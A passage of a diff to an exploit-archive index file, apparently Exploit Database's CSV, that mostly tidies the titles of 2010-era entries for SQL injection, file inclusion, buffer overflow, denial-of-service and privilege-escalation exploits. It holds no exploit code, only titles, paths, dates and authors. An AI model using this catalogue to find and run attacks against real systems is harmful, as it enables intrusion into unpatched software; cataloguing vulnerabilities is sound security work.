SQL Injection",2010-03-26,"Easy Laster",php,webapps,0 11886,platforms/windows/remote/11886.py,"SAP MaxDB - Malformed Handshake Request Remote Code Execution",2010-03-26,"S2 Crew",windows,remote,0 11888,platforms/php/webapps/11888.txt,"DaFun Spirit 2.2.5 - Multiple Remote File Inclusion",2010-03-26,2010-03-26,php,webapps,0 -11889,platforms/php/webapps/11889.txt,"leaftec CMS - Multiple vulnerabilities",2010-03-26,Valentin,php,webapps,0 +11889,platforms/php/webapps/11889.txt,"leaftec CMS - Multiple Vulnerabilities",2010-03-26,Valentin,php,webapps,0 11890,platforms/ios/dos/11890.txt,"iOS Safari - Bad 'VML' Remote Denial of Service",2010-03-26,"Nishant Das Patnaik",ios,dos,0 11891,platforms/ios/dos/11891.txt,"iOS Safari - Remote Denial of Service",2010-03-26,"Nishant Das Patnaik",ios,dos,0 11892,platforms/php/webapps/11892.txt,"post Card - 'catid' SQL Injection",2010-03-26,"Hussin X",php,webapps,0 @@ -10905,7 +10906,7 @@ id,file,description,date,author,platform,type,port 11929,platforms/php/webapps/11929.txt,"Joomla Component com_radio - SQL Injection",2010-03-29,"DevilZ TM",php,webapps,0 11930,platforms/windows/dos/11930.pl,"ASX to MP3 Converter 3.0.0.100 - Local Stack Overflow (PoC)",2010-03-29,mat,windows,dos,0 11931,platforms/asp/webapps/11931.txt,"Asp - comersus7F Shopping Cart Software Backup Dump",2010-03-29,indoushka,asp,webapps,0 -11932,platforms/linux/dos/11932.txt,"xwine 1.0.1 - (.exe) Local Crash (PoC)",2010-03-29,JosS,linux,dos,0 +11932,platforms/linux/dos/11932.txt,"xwine 1.0.1 - '.exe' Local Crash (PoC)",2010-03-29,JosS,linux,dos,0 11934,platforms/php/webapps/11934.txt,"Powie's PSCRIPT Gästebuch 2.09 - SQL Injection",2010-03-29,"Easy Laster",php,webapps,0 11935,platforms/php/webapps/11935.txt,"Joomla Component com_guide - SQL Injection",2010-03-30,"DevilZ TM",php,webapps,0 11938,platforms/php/webapps/11938.txt,"Pepsi CMS (Irmin cms) pepsi-0.6-BETA2 - Multiple Local File",2010-03-30,eidelweiss,php,webapps,0 @@ -10915,7 +10916,7 @@ id,file,description,date,author,platform,type,port 11942,platforms/php/webapps/11942.txt,"Joomla Component com_actions - SQL Injection",2010-03-29,"DevilZ TM",php,webapps,0 11943,platforms/php/webapps/11943.txt,"React software - Local File Inclusion",2010-03-29,SNK,php,webapps,0 11944,platforms/windows/local/11944.pl,"ASX to MP3 Converter 3.0.0.100 - '.pls' Universal Stack Overflow",2010-03-28,mat,windows,local,0 -11946,platforms/php/webapps/11946.txt,"FaMarket 2 - (Authentication Bypass)",2010-03-30,indoushka,php,webapps,0 +11946,platforms/php/webapps/11946.txt,"FaMarket 2 - Authentication Bypass",2010-03-30,indoushka,php,webapps,0 11947,platforms/php/webapps/11947.txt,"Yamamah 1.00 - Multiple Vulnerabilities",2010-03-30,indoushka,php,webapps,0 11948,platforms/php/webapps/11948.txt,"Denapars Shop Script - Multiple Vulnerabilities",2010-03-30,indoushka,php,webapps,0 11949,platforms/php/webapps/11949.txt,"Fa-Ads - Authentication Bypass",2010-03-30,indoushka,php,webapps,0 @@ -10926,27 +10927,27 @@ id,file,description,date,author,platform,type,port 11955,platforms/windows/dos/11955.py,"All to All Audio Convertor 2.0 - Files Stack Overflow (PoC)",2010-03-30,ITSecTeam,windows,dos,0 11957,platforms/windows/local/11957.py,"Shadow Stream Recorder 3.0.1.7 - '.asx' Local Buffer Overflow",2010-03-30,b0telh0,windows,local,0 11958,platforms/windows/local/11958.py,"ASX to MP3 Converter 3.0.0.100 - Local Stack Overflow Exploit",2010-03-30,"Hazem mofeed",windows,local,0 -11959,platforms/windows/dos/11959.pl,"Xilisoft Blackberry Ring Tone Maker - '.wma' Local Crash",2010-03-30,anonymous,windows,dos,0 +11959,platforms/windows/dos/11959.pl,"Xilisoft BlackBerry Ring Tone Maker - '.wma' Local Crash",2010-03-30,anonymous,windows,dos,0 11960,platforms/php/webapps/11960.txt,"KimsQ 040109 - Multiple Remote File Inclusion",2010-03-30,mat,php,webapps,0 11962,platforms/php/webapps/11962.txt,"Satellite-X 4.0 - (Authentication Bypass) SQL Injection",2010-03-30,indoushka,php,webapps,0 11963,platforms/php/webapps/11963.txt,"Huron CMS 8 11 2007 - (Authentication Bypass) SQL Injection",2010-03-30,mat,php,webapps,0 11964,platforms/multiple/webapps/11964.pl,"Easy-Clanpage 2.1 - SQL Injection",2010-03-30,"Easy Laster",multiple,webapps,0 11965,platforms/php/webapps/11965.txt,"kora - Reinstall Admin Information",2010-03-30,indoushka,php,webapps,0 -11966,platforms/windows/dos/11966.py,"Easy Icon Maker - .ico File Reading Crash",2010-03-30,ITSecTeam,windows,dos,0 +11966,platforms/windows/dos/11966.py,"Easy Icon Maker - '.ico' File Reading Crash",2010-03-30,ITSecTeam,windows,dos,0 11967,platforms/php/webapps/11967.txt,"Snipe Photo Gallery - Bypass Remote Upload",2010-03-30,indoushka,php,webapps,0 11968,platforms/php/webapps/11968.txt,"Hosting-PHP-dynamic - Authentication Bypass",2010-03-30,indoushka,php,webapps,0 11973,platforms/windows/remote/11973.txt,"CompleteFTP Server - Directory Traversal",2010-03-30,zombiefx,windows,remote,0 11974,platforms/windows/remote/11974.py,"HP OpenView NNM - OvWebHelp.exe CGI Topic Overflow",2010-03-30,"S2 Crew",windows,remote,0 11975,platforms/windows/dos/11975.rb,"Free MP3 CD Ripper 2.6 - Exploit (1)",2010-03-30,"Richard leahy",windows,dos,0 11976,platforms/windows/local/11976.php,"Free MP3 CD Ripper 2.6 - (wav) Stack Buffer Overflow (PoC)",2010-03-31,mr_me,windows,local,0 -11977,platforms/windows/dos/11977.pl,"CDTrustee - .BAK Local Crash (PoC)",2010-03-31,anonymous,windows,dos,0 +11977,platforms/windows/dos/11977.pl,"CDTrustee - '.BAK' Local Crash (PoC)",2010-03-31,anonymous,windows,dos,0 11978,platforms/php/webapps/11978.txt,"Joomla Component DW Graph - Local File Inclusion",2010-03-31,"Chip d3 bi0s",php,webapps,0 11979,platforms/php/webapps/11979.pl,"Centreon IT & Network Monitoring 2.1.5 - SQL Injection",2010-03-31,"Jonathan Salwan",php,webapps,0 11980,platforms/php/webapps/11980.txt,"Easy-Clanpage 2.2 - Multiple SQL Injections / Exploit",2010-03-31,"Easy Laster",php,webapps,0 11981,platforms/windows/local/11981.py,"WM Downloader 3.0.0.9 - '.asx' Local Buffer Overflow",2010-03-31,b0telh0,windows,local,0 11984,platforms/windows/dos/11984.py,"Optimal Archive 1.38 - '.zip' SEH (PoC)",2010-03-31,TecR0c,windows,dos,0 11985,platforms/windows/dos/11985.sh,"BitComet 1.19 - Remote Denial of Service",2010-03-31,"Pierre Nogues",windows,dos,0 -11986,platforms/linux/remote/11986.py,"OpenDcHub 0.8.1 - Remote Code Execution Exploit",2010-03-31,"Pierre Nogues",linux,remote,0 +11986,platforms/linux/remote/11986.py,"OpenDcHub 0.8.1 - Remote Code Execution",2010-03-31,"Pierre Nogues",linux,remote,0 11987,platforms/windows/dos/11987.txt,"Adobe Reader - Escape From PDF",2010-03-31,"Didier Stevens",windows,dos,0 11989,platforms/php/webapps/11989.txt,"Faweb_2 - Multiple Vulnerabilities",2010-03-30,indoushka,php,webapps,0 11990,platforms/php/webapps/11990.txt,"Joomla Component com_network - SQL Injection",2010-04-01,"DevilZ TM",php,webapps,0 @@ -10959,7 +10960,7 @@ id,file,description,date,author,platform,type,port 11997,platforms/php/webapps/11997.txt,"Joomla Component Jvehicles - Local File Inclusion",2010-04-01,"Chip d3 bi0s",php,webapps,0 11998,platforms/php/webapps/11998.txt,"Joomla Component User Status - Local File Inclusion",2010-04-01,"Chip d3 bi0s",php,webapps,0 11999,platforms/php/webapps/11999.txt,"Joomla Component webERPcustomer - Local File Inclusion",2010-04-01,"Chip d3 bi0s",php,webapps,0 -12000,platforms/windows/dos/12000.pl,"Kwik Pay Payroll 4.10.3 - (.mdb) Crash (PoC)",2010-04-01,anonymous,windows,dos,0 +12000,platforms/windows/dos/12000.pl,"Kwik Pay Payroll 4.10.3 - '.mdb' Crash (PoC)",2010-04-01,anonymous,windows,dos,0 12001,platforms/windows/dos/12001.pl,"Kwik Pay Payroll 4.10.3 - '.zip' Denial of Service",2010-04-01,anonymous,windows,dos,0 12002,platforms/php/webapps/12002.txt,"MusicBox 3.3 - Arbitrary File Upload",2010-04-01,indoushka,php,webapps,0 12003,platforms/php/webapps/12003.txt,"onepound Shop / CMS - Cross-Site Scripting / SQL Injection",2010-04-01,Valentin,php,webapps,0 @@ -10967,7 +10968,7 @@ id,file,description,date,author,platform,type,port 12005,platforms/php/webapps/12005.txt,"Profi Einzelgebots Auktions System - Blind SQL Injection",2010-04-01,"Easy Laster",php,webapps,0 12006,platforms/php/webapps/12006.txt,"Simple Calculator by Peter Rekdal Sunde - Remote Upload",2010-04-01,indoushka,php,webapps,0 12007,platforms/php/webapps/12007.txt,"SimpNews 2.16.2 - Multiple SQL Injections",2010-04-01,NoGe,php,webapps,0 -12008,platforms/windows/local/12008.pl,"TugZip 3.5 - .zip File Buffer Overflow",2010-04-01,Lincoln,windows,local,0 +12008,platforms/windows/local/12008.pl,"TugZip 3.5 - '.ZIP' File Buffer Overflow",2010-04-01,Lincoln,windows,local,0 12009,platforms/php/webapps/12009.html,"CMS Made Simple 1.7 - Cross-Site Request Forgery",2010-04-02,"pratul agrawal",php,webapps,0 12010,platforms/windows/dos/12010.pl,"uTorrent WebUI 0.370 - Authorization header Denial of Service",2010-04-02,"zombiefx darkernet",windows,dos,0 12011,platforms/windows/dos/12011.txt,"Google Chrome 4.1 - OOB Array Indexing Bug",2010-04-02,"Tobias Klein",windows,dos,0 @@ -10980,7 +10981,7 @@ id,file,description,date,author,platform,type,port 12021,platforms/php/webapps/12021.txt,"68kb 68KB Base 1.0.0rc3 - Admin Cross-Site Request Forgery",2010-04-02,"Jelmer de Hen",php,webapps,0 12022,platforms/php/webapps/12022.txt,"68KB Knowledge Base 1.0.0rc3 - Edit Main Settings Cross-Site Request Forgery",2010-04-02,"Jelmer de Hen",php,webapps,0 12024,platforms/windows/local/12024.php,"Zip Unzip 6.0 - '.zip' Stack Buffer Overflow (PoC)",2010-04-03,mr_me,windows,local,0 -12025,platforms/windows/dos/12025.php,"Dualis 20.4 - '.bin' Local Daniel Of Service",2010-04-03,"Yakir Wizman",windows,dos,0 +12025,platforms/windows/dos/12025.php,"Dualis 20.4 - '.bin' Local Denial Of Service",2010-04-03,"Yakir Wizman",windows,dos,0 12026,platforms/php/webapps/12026.txt,"phpscripte24 Vor und Rückwärts Auktions System - Blind SQL Injection",2010-04-03,"Easy Laster",php,webapps,0 12027,platforms/windows/dos/12027.py,"DSEmu 0.4.10 - '.nds' Local Crash Exploit",2010-04-03,l3D,windows,dos,0 12028,platforms/php/webapps/12028.txt,"PHP-fusion dsmsf - (module downloads) SQL Injection",2010-04-03,Inj3ct0r,php,webapps,0 @@ -10988,11 +10989,11 @@ id,file,description,date,author,platform,type,port 12030,platforms/windows/dos/12030.html,"IncrediMail 2.0 - ActiveX (Authenticate) Buffer Overflow (PoC)",2010-04-03,d3b4g,windows,dos,0 12031,platforms/php/webapps/12031.html,"Advanced Management For Services Sites - Remote Add Admin Exploit",2010-04-03,alnjm33,php,webapps,0 12032,platforms/windows/dos/12032.html,"Microsoft Internet Explorer Tabular Data Control - ActiveX Remote Code Execution",2010-04-03,ZSploit.com,windows,dos,0 -12033,platforms/multiple/remote/12033.txt,"Java Mini Web Server 1.0 - Path Traversal / Cross-Site Scripting",2010-04-03,"cp77fk4r ",multiple,remote,0 -12034,platforms/php/webapps/12034.txt,"flatpress 0.909.1 - Persistent Cross-Site Scripting",2010-04-03,ITSecTeam,php,webapps,0 +12033,platforms/multiple/remote/12033.txt,"Java Mini Web Server 1.0 - Directory Traversal / Cross-Site Scripting",2010-04-03,"cp77fk4r ",multiple,remote,0 +12034,platforms/php/webapps/12034.txt,"Flatpress 0.909.1 - Persistent Cross-Site Scripting",2010-04-03,ITSecTeam,php,webapps,0 12035,platforms/windows/local/12035.pl,"ZipScan 2.2c - SEH",2010-04-03,"Lincoln and corelanc0d3r",windows,local,0 12036,platforms/hardware/webapps/12036.txt,"Edimax AR-7084GA Router - Cross-Site Request Forgery / Persistent Cross-Site Scripting Exploit",2010-04-03,l3D,hardware,webapps,0 -12037,platforms/php/webapps/12037.txt,"Joomla component jp_jobs - SQL Injection",2010-04-03,Valentin,php,webapps,0 +12037,platforms/php/webapps/12037.txt,"Joomla Component jp_jobs - SQL Injection",2010-04-03,Valentin,php,webapps,0 12038,platforms/php/webapps/12038.txt,"Advanced Management For Services Sites - Bypass Create And Download SQL Backup",2010-04-04,indoushka,php,webapps,0 12039,platforms/multiple/webapps/12039.txt,"QuickEStore 6.1 - Backup Dump",2010-04-04,indoushka,multiple,webapps,0 12041,platforms/php/webapps/12041.txt,"Solutive CMS - SQL Injection",2010-04-04,"Th3 RDX",php,webapps,0 @@ -11003,7 +11004,7 @@ id,file,description,date,author,platform,type,port 12047,platforms/php/webapps/12047.html,"nodesforum 1.033 - Remote File Inclusion",2010-04-04,ITSecTeam,php,webapps,0 12048,platforms/php/webapps/12048.html,"ttCMS 5.0 - Remote File Inclusion",2010-04-04,ITSecTeam,php,webapps,0 12049,platforms/php/webapps/12049.html,"Uiga Proxy - Remote File Inclusion",2010-04-04,ITSecTeam,php,webapps,0 -12050,platforms/php/webapps/12050.txt,"MassMirror Uploader - Multiple Remote File Inclusion Exploit",2010-04-04,"cr4wl3r ",php,webapps,0 +12050,platforms/php/webapps/12050.txt,"MassMirror Uploader - Multiple Remote File Inclusion",2010-04-04,"cr4wl3r ",php,webapps,0 12051,platforms/windows/local/12051.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow",2010-04-04,"Yakir Wizman",windows,local,0 12052,platforms/php/webapps/12052.txt,"SAGU-PRO 1.0 - Multiple Remote File Inclusion",2010-04-04,mat,php,webapps,0 12053,platforms/windows/local/12053.py,"ZipCentral - '.zip' SEH Exploit",2010-04-04,TecR0c,windows,local,0 @@ -11029,7 +11030,7 @@ id,file,description,date,author,platform,type,port 12075,platforms/php/webapps/12075.txt,"LionWiki 3.x - 'index.php' Arbitrary File Upload",2010-04-05,ayastar,php,webapps,0 12076,platforms/php/webapps/12076.pl,"ilchClan 1.0.5 - 'cid' SQL Injection",2010-04-05,"Easy Laster",php,webapps,0 12077,platforms/php/webapps/12077.txt,"Joomla Component News Portal com_news - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0 -12078,platforms/php/webapps/12078.txt,"Joomla Freestyle FAQ Lite Component 1.3 com_fss (faqid) - SQL Injection",2010-04-06,"Chip d3 bi0s",php,webapps,0 +12078,platforms/php/webapps/12078.txt,"Joomla FreeStyle FAQ Lite Component 1.3 com_fss (faqid) - SQL Injection",2010-04-06,"Chip d3 bi0s",php,webapps,0 12079,platforms/windows/dos/12079.pl,"Microsoft Office 2010 Beta - Communicator SIP Denial of Service",2010-04-06,indoushka,windows,dos,0 12080,platforms/windows/dos/12080.txt,"Foxit Reader 3.2.1.0401 - Denial of Service",2010-04-06,juza,windows,dos,0 12081,platforms/windows/dos/12081.php,"Jzip 1.3 - '.zip' Unicode Buffer Overflow (PoC)",2010-04-06,mr_me,windows,dos,0 @@ -11049,7 +11050,7 @@ id,file,description,date,author,platform,type,port 12095,platforms/linux/dos/12095.txt,"Virata EmWeb R6.0.1 - Remote Crash",2010-04-06,"Jobert Abma",linux,dos,0 12096,platforms/windows/dos/12096.txt,"Juke 4.0.2 - Denial of Service Multiple Files",2010-04-06,anonymous,windows,dos,0 12097,platforms/php/webapps/12097.txt,"Joomla Component XOBBIX - prodid SQL Injection",2010-04-06,AntiSecurity,php,webapps,0 -12098,platforms/php/webapps/12098.txt,"Wordpress Plugin NextGEN Gallery 1.5.1 - Cross-Site Scripting",2010-04-06,"Alejandro Rodriguez",php,webapps,0 +12098,platforms/php/webapps/12098.txt,"WordPress Plugin NextGEN Gallery 1.5.1 - Cross-Site Scripting",2010-04-06,"Alejandro Rodriguez",php,webapps,0 12100,platforms/asp/webapps/12100.txt,"Espinas CMS - SQL Injection",2010-04-07,"Pouya Daneshmand",asp,webapps,0 12101,platforms/php/webapps/12101.txt,"Joomla Component aWiki com_awiki - Local File Inclusion",2010-04-07,"Angela Zhang",php,webapps,0 12102,platforms/php/webapps/12102.txt,"Joomla Component VJDEO com_vjdeo 1.0 - Local File Inclusion",2010-04-07,"Angela Zhang",php,webapps,0 @@ -11063,26 +11064,26 @@ id,file,description,date,author,platform,type,port 12110,platforms/windows/dos/12110.pl,"CompleteFTP 3.3.0 - Remote Memory Consumption Denial of Service",2010-04-08,"Jonathan Salwan",windows,dos,0 12111,platforms/php/webapps/12111.txt,"Joomla Component Webee Comments - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0 12112,platforms/php/webapps/12112.txt,"Joomla Component Realtyna Translator - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0 -12113,platforms/php/webapps/12113.txt,"Joomla Component AWDwall-Joomla - Local File Inclusion / SQL Injection [cbuser]",2010-04-08,AntiSecurity,php,webapps,0 +12113,platforms/php/webapps/12113.txt,"Joomla Component AWDwall-Joomla - (cbuser) Local File Inclusion / SQL Injection",2010-04-08,AntiSecurity,php,webapps,0 12114,platforms/multiple/remote/12114.txt,"miniature java Web server 1.71 - Multiple Vulnerabilities",2010-04-08,"cp77fk4r ",multiple,remote,0 12115,platforms/php/webapps/12115.txt,"Kubeit CMS - SQL Injection",2010-04-08,Phenom,php,webapps,0 12117,platforms/windows/remote/12117.txt,"Java Deployment Toolkit - Performs Insufficient Validation of Parameters",2010-04-09,"Tavis Ormandy",windows,remote,0 12118,platforms/php/webapps/12118.txt,"Joomla Component PowerMail Pro com_powermail - Local File Inclusion",2010-04-09,AntiSecurity,php,webapps,0 -12119,platforms/windows/remote/12119.pl,"Windows FTP Server 1.4 - Authentication Bypass",2010-04-09,chap0,windows,remote,0 +12119,platforms/windows/remote/12119.pl,"Microsoft Windows FTP Server 1.4 - Authentication Bypass",2010-04-09,chap0,windows,remote,0 12120,platforms/php/webapps/12120.txt,"Joomla Component Foobla Suggestions com_foobla - Local File Inclusion",2010-04-09,"Chip d3 bi0s",php,webapps,0 12121,platforms/php/webapps/12121.txt,"Joomla Component JA Voice com_javoice - Local File Inclusion",2010-04-09,kaMtiEz,php,webapps,0 -12122,platforms/multiple/remote/12122.txt,"JAVA Web Start - Arbitrary command-line Injection",2010-04-09,"Ruben Santamarta ",multiple,remote,0 +12122,platforms/multiple/remote/12122.txt,"JAVA Web Start - Arbitrary Command-Line Injection",2010-04-09,"Ruben Santamarta ",multiple,remote,0 12123,platforms/php/webapps/12123.txt,"Joomla Component com_pcchess - Local File Inclusion",2010-04-09,team_elite,php,webapps,0 12124,platforms/php/webapps/12124.txt,"Joomla Component huruhelpdesk - SQL Injection",2010-04-09,bumble_be,php,webapps,0 12128,platforms/php/webapps/12128.txt,"GarageSales - Remote Upload",2010-04-09,saidinh0,php,webapps,0 12130,platforms/linux/local/12130.py,"(Linux Kernel 2.6.34-rc3) ReiserFS (Redhat / Ubuntu 9.10) - xattr Privilege Escalation",2010-04-09,"Jon Oberheide",linux,local,0 12131,platforms/windows/dos/12131.py,"Tembria Server Monitor 5.6.0 - Denial of Service",2010-04-09,Lincoln,windows,dos,0 -12132,platforms/php/webapps/12132.pl,"joomla component com_agenda 1.0.1 - 'id' SQL Injection",2010-04-09,v3n0m,php,webapps,0 +12132,platforms/php/webapps/12132.pl,"joomla Component com_agenda 1.0.1 - 'id' SQL Injection",2010-04-09,v3n0m,php,webapps,0 12133,platforms/multiple/webapps/12133.txt,"Asset Manager 1.0 - Arbitrary File Upload",2010-04-09,"Shichemt Alen and NeT_Own3r",multiple,webapps,0 12134,platforms/php/webapps/12134.txt,"MMHAQ CMS - SQL Injection",2010-04-10,s1ayer,php,webapps,0 12135,platforms/php/webapps/12135.txt,"mygamingladder MGL Combo System 7.5 - SQL Injection",2010-04-10,"Easy Laster",php,webapps,0 12136,platforms/php/webapps/12136.txt,"Joomla Component com_properties[aid] - SQL Injection",2010-04-10,c4uR,php,webapps,0 -12137,platforms/php/webapps/12137.txt,"joomla component allvideos - Blind SQL Injection",2010-04-10,bumble_be,php,webapps,0 +12137,platforms/php/webapps/12137.txt,"joomla Component allvideos - Blind SQL Injection",2010-04-10,bumble_be,php,webapps,0 12138,platforms/php/webapps/12138.txt,"Joomla Com_Ca - SQL Injection",2010-04-10,DigitALL,php,webapps,0 12139,platforms/php/webapps/12139.txt,"Kiasabz Article News CMS Magazine - SQL Injection",2010-04-10,indoushka,php,webapps,0 12140,platforms/php/webapps/12140.php,"xBtiTracker - SQL Injection",2010-04-11,InATeam,php,webapps,0 @@ -11093,12 +11094,12 @@ id,file,description,date,author,platform,type,port 12145,platforms/php/webapps/12145.txt,"Joomla Component Jfeedback! - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 12146,platforms/php/webapps/12146.txt,"Joomla Component JProject Manager - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 12147,platforms/php/webapps/12147.txt,"Joomla Component Preventive And Reservation - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 -12148,platforms/php/webapps/12148.txt,"Joomla Component RokModule - Blind SQL Injection [moduleid]",2010-04-11,AntiSecurity,php,webapps,0 +12148,platforms/php/webapps/12148.txt,"Joomla Component RokModule - 'moduleid' Blind SQL Injection",2010-04-11,AntiSecurity,php,webapps,0 12149,platforms/php/webapps/12149.txt,"Joomla Component spsNewsletter - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 12150,platforms/php/webapps/12150.txt,"Joomla Component AlphaUserPoints - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 12151,platforms/php/webapps/12151.txt,"Joomla Component TRAVELbook - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 12152,platforms/windows/remote/12152.pl,"Trellian FTP Client - PASV Buffer Overflow Exploit",2010-04-11,zombiefx,windows,remote,0 -12153,platforms/php/webapps/12153.txt,"joomla component education - SQL Injection",2010-04-11,bumble_be,php,webapps,0 +12153,platforms/php/webapps/12153.txt,"joomla Component education - SQL Injection",2010-04-11,bumble_be,php,webapps,0 12154,platforms/php/dos/12154.txt,"vBulletin 'Cyb - Advanced Forum Statistics' Denial of Service",2010-04-10,"Andhra Hackers",php,dos,0 12155,platforms/php/webapps/12155.txt,"AuroraGPT 4.0 - Remote Code Execution",2010-04-11,"Amoo Arash",php,webapps,0 12156,platforms/windows/remote/12156.txt,"Microsoft Internet Explorer/Opera - source code viewer Null Character Handling",2010-04-11,"Daniel Correa",windows,remote,0 @@ -11107,15 +11108,15 @@ id,file,description,date,author,platform,type,port 12159,platforms/php/webapps/12159.txt,"Joomla Component Multi-Venue Restaurant Menu Manager - SQL Injection",2010-04-11,Valentin,php,webapps,0 12160,platforms/php/webapps/12160.txt,"HotNews 0.7.2 - Remote File Inclusion",2010-04-11,team_elite,php,webapps,0 12161,platforms/windows/dos/12161.pl,"Aladdin eToken PKI Client 4.5 - Virtual File Handling Unspecified Memory Corruption (PoC)",2010-04-11,LiquidWorm,windows,dos,0 -12162,platforms/php/webapps/12162.txt,"Joomla component mv_restaurantmenumanager - SQL Injection",2010-04-11,Sudden_death,php,webapps,0 +12162,platforms/php/webapps/12162.txt,"Joomla Component mv_restaurantmenumanager - SQL Injection",2010-04-11,Sudden_death,php,webapps,0 12163,platforms/php/webapps/12163.txt,"Worldviewer.com CMS - SQL Injection",2010-04-12,"41.w4r10r aka AN1L",php,webapps,0 12164,platforms/php/webapps/12164.txt,"YaPiG 0.94.0u - Remote File Inclusion",2010-04-12,JIKO,php,webapps,0 12165,platforms/multiple/dos/12165.txt,"PHP 5.3.0 - getopt() Denial of Service",2010-04-12,Napst3r,multiple,dos,0 12166,platforms/php/webapps/12166.txt,"Joomla Component Web TV com_webtv - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 12167,platforms/php/webapps/12167.txt,"Joomla Component Horoscope com_horoscope - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 12168,platforms/php/webapps/12168.txt,"Joomla Component Arcade Games com_arcadegames - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 -12169,platforms/php/webapps/12169.txt,"Joomla Component FlashGames com_flashgames - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 -12170,platforms/php/webapps/12170.txt,"Joomla Component AddressBook com_addressbook - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 +12169,platforms/php/webapps/12169.txt,"Joomla Component Flashgames com_Flashgames - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 +12170,platforms/php/webapps/12170.txt,"Joomla Component AddressBook com_AddressBook - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 12171,platforms/php/webapps/12171.txt,"Joomla Component Easy Ad Banner com_advertising - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 12172,platforms/php/webapps/12172.txt,"Joomla Component CV Maker com_cvmaker - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 12173,platforms/php/webapps/12173.txt,"Joomla Component My Files com_myfiles - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 @@ -11135,7 +11136,7 @@ id,file,description,date,author,platform,type,port 12188,platforms/multiple/dos/12188.txt,"VMware Remote Console e.x.p build-158248 - Format String",2010-04-12,"Alexey Sintsov",multiple,dos,0 12189,platforms/windows/local/12189.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,windows,local,0 12190,platforms/php/webapps/12190.txt,"Joomla Component Jvehicles - (aid) SQL Injection",2010-04-13,"Don Tukulesto",php,webapps,0 -12191,platforms/php/webapps/12191.txt,"joomla component com_jp_jobs 1.2.0 - 'id' SQL Injection",2010-04-13,v3n0m,php,webapps,0 +12191,platforms/php/webapps/12191.txt,"joomla Component com_jp_jobs 1.2.0 - 'id' SQL Injection",2010-04-13,v3n0m,php,webapps,0 12192,platforms/php/webapps/12192.txt,"blog system 1.5 - Multiple Vulnerabilities",2010-04-13,"cp77fk4r ",php,webapps,0 12193,platforms/php/webapps/12193.txt,"Openurgence vaccin 1.03 - (Remote File Inclusion / Local File Inclusion) Multiple File Include",2010-04-13,"cr4wl3r ",php,webapps,0 12194,platforms/php/webapps/12194.txt,"Police Municipale Open Main Courante 1.01beta - (Remote File Inclusion / Local File Inclusion) Multiple File Include",2010-04-13,"cr4wl3r ",php,webapps,0 @@ -11153,7 +11154,7 @@ id,file,description,date,author,platform,type,port 12207,platforms/windows/dos/12207.html,"MagnetoSoft NetworkResources 4.0.0.5 - ActiveX NetShareEnum SEH Overwrite (PoC)",2010-04-13,s4squatch,windows,dos,0 12208,platforms/windows/dos/12208.html,"MagnetoSoft NetworkResources - ActiveX NetConnectionEnum SEH Overwrite (PoC)",2010-04-13,s4squatch,windows,dos,0 12212,platforms/php/webapps/12212.txt,"Opentel Openmairie tel 1.02 - Local File Inclusion",2010-04-14,"cr4wl3r ",php,webapps,0 -12213,platforms/windows/local/12213.c,"Micropoint Proactive Denfense Mp110013.sys 1.3.10123.0 - Privilege Escalation",2010-04-14,MJ0011,windows,local,0 +12213,platforms/windows/local/12213.c,"Micropoint ProActive Denfense Mp110013.sys 1.3.10123.0 - Privilege Escalation",2010-04-14,MJ0011,windows,local,0 12217,platforms/multiple/dos/12217.py,"Aircrack-NG Tools svn r1675 - Remote Exploit",2010-04-14,"Lukas Lueg",multiple,dos,0 12218,platforms/asp/webapps/12218.txt,"School Management System Pro 6.0.0 - Backup Dump",2010-04-14,indoushka,asp,webapps,0 12219,platforms/php/webapps/12219.txt,"Mp3 Online Id Tag Editor - Remote File Inclusion",2010-04-14,indoushka,php,webapps,0 @@ -11173,29 +11174,29 @@ id,file,description,date,author,platform,type,port 12234,platforms/php/webapps/12234.txt,"Joomla Component Media Mall Factory com_mediamall - Blind SQL Injection",2010-04-14,AntiSecurity,php,webapps,0 12235,platforms/php/webapps/12235.txt,"Joomla Component Love Factory com_lovefactory - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0 12236,platforms/php/webapps/12236.txt,"Joomla Component JA Comment com_jacomment - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0 -12237,platforms/php/webapps/12237.txt,"Joomla Component Delicious Bookmarks com_delicious - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0 +12237,platforms/php/webapps/12237.txt,"Joomla Component Delicious BookMarks com_delicious - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0 12238,platforms/php/webapps/12238.txt,"Joomla Component Deluxe Blog Factory com_blogfactory - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0 12239,platforms/php/webapps/12239.txt,"Joomla Component BeeHeard Lite com_beeheard - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0 12240,platforms/windows/dos/12240.py,"Mocha LPD 1.9 - Remote Buffer Overflow Denial of Service (PoC)",2010-04-14,mr_me,windows,dos,0 -15732,platforms/linux/dos/15732.txt,"FontForge - .BDF Font File Stack Based Buffer Overflow",2010-12-14,"Ulrik Persson",linux,dos,0 +15732,platforms/linux/dos/15732.txt,"FontForge - '.BDF' Font File Stack Based Buffer Overflow",2010-12-14,"Ulrik Persson",linux,dos,0 12241,platforms/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities",2010-04-14,eidelweiss,php,webapps,0 12242,platforms/jsp/webapps/12242.txt,"RJ-iTop Network Vulnerability Scanner System - Multiple SQL 